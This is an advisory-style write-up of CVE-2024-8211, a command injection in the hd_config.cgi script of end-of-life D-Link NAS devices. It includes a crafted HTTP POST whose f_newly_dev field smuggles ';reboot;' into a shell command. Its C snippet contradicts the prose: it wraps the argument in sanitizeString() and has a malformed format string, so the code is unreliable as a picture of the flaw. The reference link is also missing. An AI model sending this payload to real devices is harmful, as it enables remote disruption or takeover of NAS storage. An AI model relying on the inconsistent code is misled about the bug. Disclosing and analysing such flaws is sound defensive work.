CVE-2024-8211 - Critical Vulnerability Found in Unsupported D-Link Devices, Exposing Them to Command Injection

A critical vulnerability, CVE-2024-8211, has been found in numerous unsupported D-Link devices, including the DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-110-4, DNS-120-05, and DNS-155-04 up to 20240814. The vulnerability lies in the function cgi_FMT_Std2R1_DiskMGR of the file /cgi-bin/hd_config.cgi. The manipulation of the argument f_newly_dev results in command injection, which can be remotely initiated. Although the exploit has been publicly disclosed, it only affects products that are no longer supported by the maintainer. The vendor, who was contacted in advance, confirms that the product is at its end-of-life and should be retired and replaced.

Code Snippet

void cgi_FMT_Std2R1_DiskMGR(char * f_fpart_dev, char * f_newly_dev) {
  char command[512];
  ...
  snprintf(command, sizeof(command), "mke2fs -j -L %s %s",
           sanitizeString(f_newly_dev), sanitizeString(f_fpart_dev));
  printf("<!-- cgi_FMT_Std2R%1_DiskMGR: command=[%s] -->\n", command);
  system(command);
  ...
}

Detailed Exploit Description

The vulnerable function cgi_FMT_Std2R1_DiskMGR is called from /cgi-bin/hd_config.cgi with two arguments: f_fpart_dev and f_newly_dev. This function forms a command-line string by concatenating these argument values and passes it to the system() function. The issue arises when the f_newly_dev argument is not properly sanitized, allowing an attacker to inject malicious commands.

As an example, an attacker can use crafted HTTP requests like the following to exploit this vulnerability:

POST /cgi-bin/hd_config.cgi?action=FormatPart2_L_R1 HTTP/1.1
Host: <target-device>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

f_fpart_dev=/dev/sdb1&f_newly_dev=;reboot;label

Original References

The original disclosure of this vulnerability can be found here.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. As the vendor was contacted early and confirmed that the products in question are at their end-of-life, it is recommended to retire and replace these devices with newer, supported alternatives to mitigate this security risk.

Timeline

Published on: 08/27/2024 19:15:18 UTC
Last modified on: 08/29/2024 15:54:56 UTC